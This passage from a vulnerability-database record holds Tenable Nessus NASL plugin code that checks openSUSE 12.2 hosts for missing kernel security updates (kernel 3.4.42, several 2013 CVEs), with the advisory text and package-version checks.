rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-pae-devel-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-trace-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-trace-base-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-trace-base-debuginfo-3.4.33-2.24.1\") 
) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-trace-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-trace-debugsource-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-trace-devel-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-trace-devel-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-vanilla-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-vanilla-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-vanilla-debugsource-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-vanilla-devel-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-vanilla-devel-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-xen-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-xen-devel-debuginfo-3.4.33-2.24.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n 
tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:26:37", "description": "Linux kernel was updated to kernel 3.4.42 fixing various bugs and\nsecurity issues.\n\n - Refresh patches.suse/SUSE-bootsplash. Fix bootsplash\n breakage due to stable fix (bnc#813963)\n\n - Linux 3.4.39.\n\n - kABI: protect struct tracer.\n\n - Linux 3.4.38 (bnc#808829,CVE-2013-0913).\n\n - patches.kabi/kabi-protect-struct-sk_buff.patch: kABI:\n protect struct sk_buff.\n\n - patches.kabi/kabi-ipv4-remove-inclusion.patch: kABI:\n ipv4, remove inclusion.\n\n - USB: io_ti: Fix NULL dereference in chase_port()\n (bnc#806976, CVE-2013-1774).\n\n - Linux 3.4.37 (bnc#809155 bnc#809330 bnc#809748\n CVE-2013-1848).\n\n - Linux 3.4.36.\n\n - KVM: Convert MSR_KVM_SYSTEM_TIME to use\n gfn_to_hva_cache_init (bnc#806980 CVE-2013-1797).\n\n - KVM: Fix bounds checking in ioapic indirect register\n read (bnc#806980 CVE-2013-1798).\n\n - KVM: Fix for buffer overflow in handling of\n MSR_KVM_SYSTEM_TIME (bnc#806980 CVE-2013-1796).\n\n - kabi/severities: Allow kvm abi changes - kvm modules are\n self consistent\n\n - loopdev: fix a deadlock (bnc#809748).\n\n - block: use i_size_write() in bd_set_size() (bnc#809748).\n\n - drm/i915: bounds check execbuffer relocation count\n (bnc#808829,CVE-2013-0913).\n\n - TTY: do not reset master's packet mode (bnc#809330).\n\n - Update patches.fixes/ext3-Fix-format-string-issues.patch\n (bnc#809155 CVE-2013-1848).\n\n - ext3: Fix format string issues (bnc#809155).\n\n - Linux 3.4.35 (bnc#802153).\n\n - Linux 3.4.34 (CVE-2013-1763 CVE-2013-1767 bnc#792500\n bnc#806138 bnc#805633).\n\n - tmpfs: fix use-after-free of mempolicy object\n (bnc#806138, CVE-2013-1767).", "edition": 20, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : kernel (openSUSE-SU-2013:0824-1)", 
"type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1797", "CVE-2013-1767", "CVE-2013-1848", "CVE-2013-1763", "CVE-2013-1774", "CVE-2013-0913", "CVE-2013-1796", "CVE-2013-1798"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:kernel-source", "p-cpe:/a:novell:opensuse:kernel-source-vanilla", "p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource", "p-cpe:/a:novell:opensuse:kernel-debug-debuginfo", "p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo", "p-cpe:/a:novell:opensuse:kernel-ec2-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default-debugsource", "p-cpe:/a:novell:opensuse:kernel-vanilla-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-trace", "p-cpe:/a:novell:opensuse:kernel-ec2-base", "p-cpe:/a:novell:opensuse:kernel-ec2", "p-cpe:/a:novell:opensuse:kernel-trace-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-debugsource", "p-cpe:/a:novell:opensuse:kernel-xen-devel", "p-cpe:/a:novell:opensuse:kernel-trace-base", "p-cpe:/a:novell:opensuse:kernel-default-debuginfo", "p-cpe:/a:novell:opensuse:kernel-ec2-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop-debuginfo", "p-cpe:/a:novell:opensuse:kernel-ec2-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-xen-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop-base", "p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-xen-base", "p-cpe:/a:novell:opensuse:kernel-default-devel", "p-cpe:/a:novell:opensuse:kernel-devel", "p-cpe:/a:novell:opensuse:kernel-ec2-debugsource", "p-cpe:/a:novell:opensuse:kernel-pae", "p-cpe:/a:novell:opensuse:kernel-ec2-extra-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-devel", "p-cpe:/a:novell:opensuse:kernel-syms", "p-cpe:/a:novell:opensuse:kernel-pae-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-base", "p-cpe:/a:novell:opensuse:kernel-vanilla", 
"p-cpe:/a:novell:opensuse:kernel-xen", "p-cpe:/a:novell:opensuse:kernel-vanilla-devel", "p-cpe:/a:novell:opensuse:kernel-debug-base", "p-cpe:/a:novell:opensuse:kernel-xen-debugsource", "p-cpe:/a:novell:opensuse:kernel-trace-devel", "p-cpe:/a:novell:opensuse:kernel-trace-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-debugsource", "p-cpe:/a:novell:opensuse:kernel-desktop-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default", "p-cpe:/a:novell:opensuse:kernel-ec2-devel", "p-cpe:/a:novell:opensuse:kernel-ec2-extra", "p-cpe:/a:novell:opensuse:kernel-trace-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-devel", "p-cpe:/a:novell:opensuse:kernel-desktop-devel", "p-cpe:/a:novell:opensuse:kernel-xen-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-xen-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop", "p-cpe:/a:novell:opensuse:kernel-debug", "p-cpe:/a:novell:opensuse:kernel-trace-debugsource", "p-cpe:/a:novell:opensuse:kernel-default-base", "cpe:/o:novell:opensuse:12.2", "p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop-debugsource", "p-cpe:/a:novell:opensuse:kernel-default-devel-debuginfo"], "id": "OPENSUSE-2013-440.NASL", "href": "https://www.tenable.com/plugins/nessus/75012", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-440.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75012);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-0913\", \"CVE-2013-1763\", \"CVE-2013-1767\", \"CVE-2013-1774\", \"CVE-2013-1796\", \"CVE-2013-1797\", 
\"CVE-2013-1798\", \"CVE-2013-1848\");\n\n script_name(english:\"openSUSE Security Update : kernel (openSUSE-SU-2013:0824-1)\");\n script_summary(english:\"Check for the openSUSE-2013-440 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Linux kernel was updated to kernel 3.4.42 fixing various bugs and\nsecurity issues.\n\n - Refresh patches.suse/SUSE-bootsplash. Fix bootsplash\n breakage due to stable fix (bnc#813963)\n\n - Linux 3.4.39.\n\n - kABI: protect struct tracer.\n\n - Linux 3.4.38 (bnc#808829,CVE-2013-0913).\n\n - patches.kabi/kabi-protect-struct-sk_buff.patch: kABI:\n protect struct sk_buff.\n\n - patches.kabi/kabi-ipv4-remove-inclusion.patch: kABI:\n ipv4, remove inclusion.\n\n - USB: io_ti: Fix NULL dereference in chase_port()\n (bnc#806976, CVE-2013-1774).\n\n - Linux 3.4.37 (bnc#809155 bnc#809330 bnc#809748\n CVE-2013-1848).\n\n - Linux 3.4.36.\n\n - KVM: Convert MSR_KVM_SYSTEM_TIME to use\n gfn_to_hva_cache_init (bnc#806980 CVE-2013-1797).\n\n - KVM: Fix bounds checking in ioapic indirect register\n read (bnc#806980 CVE-2013-1798).\n\n - KVM: Fix for buffer overflow in handling of\n MSR_KVM_SYSTEM_TIME (bnc#806980 CVE-2013-1796).\n\n - kabi/severities: Allow kvm abi changes - kvm modules are\n self consistent\n\n - loopdev: fix a deadlock (bnc#809748).\n\n - block: use i_size_write() in bd_set_size() (bnc#809748).\n\n - drm/i915: bounds check execbuffer relocation count\n (bnc#808829,CVE-2013-0913).\n\n - TTY: do not reset master's packet mode (bnc#809330).\n\n - Update patches.fixes/ext3-Fix-format-string-issues.patch\n (bnc#809155 CVE-2013-1848).\n\n - ext3: Fix format string issues (bnc#809155).\n\n - Linux 3.4.35 (bnc#802153).\n\n - Linux 3.4.34 (CVE-2013-1763 CVE-2013-1767 bnc#792500\n bnc#806138 bnc#805633).\n\n - tmpfs: fix use-after-free of mempolicy object\n (bnc#806138, CVE-2013-1767).\"\n 
);\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=792500\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=802153\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=805633\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=806138\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=806976\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=806980\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=808829\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=809155\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=809330\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=809748\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=813963\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2013-05/msg00030.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-debugsource\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:kernel-desktop-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:kernel-source-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-devel\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-default-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-default-base-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-default-base-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-default-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-default-debugsource-3.4.42-2.28.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE12.2\", reference:\"kernel-default-devel-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-default-devel-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-devel-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-source-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-source-vanilla-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-syms-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-debug-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-debug-base-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-debug-base-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-debug-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-debug-debugsource-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-debug-devel-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-debug-devel-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-desktop-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-desktop-base-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-desktop-base-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-desktop-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-desktop-debugsource-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", 
reference:\"kernel-desktop-devel-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-desktop-devel-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-base-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-base-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-debugsource-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-devel-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-devel-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-extra-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-extra-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-pae-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-pae-base-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-pae-base-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-pae-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-pae-debugsource-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-pae-devel-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-pae-devel-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-trace-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-trace-base-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-trace-base-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-trace-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-trace-debugsource-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-trace-devel-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-trace-devel-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-vanilla-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-vanilla-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-vanilla-debugsource-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-vanilla-devel-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-vanilla-devel-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-xen-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-xen-base-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-xen-base-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-xen-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", 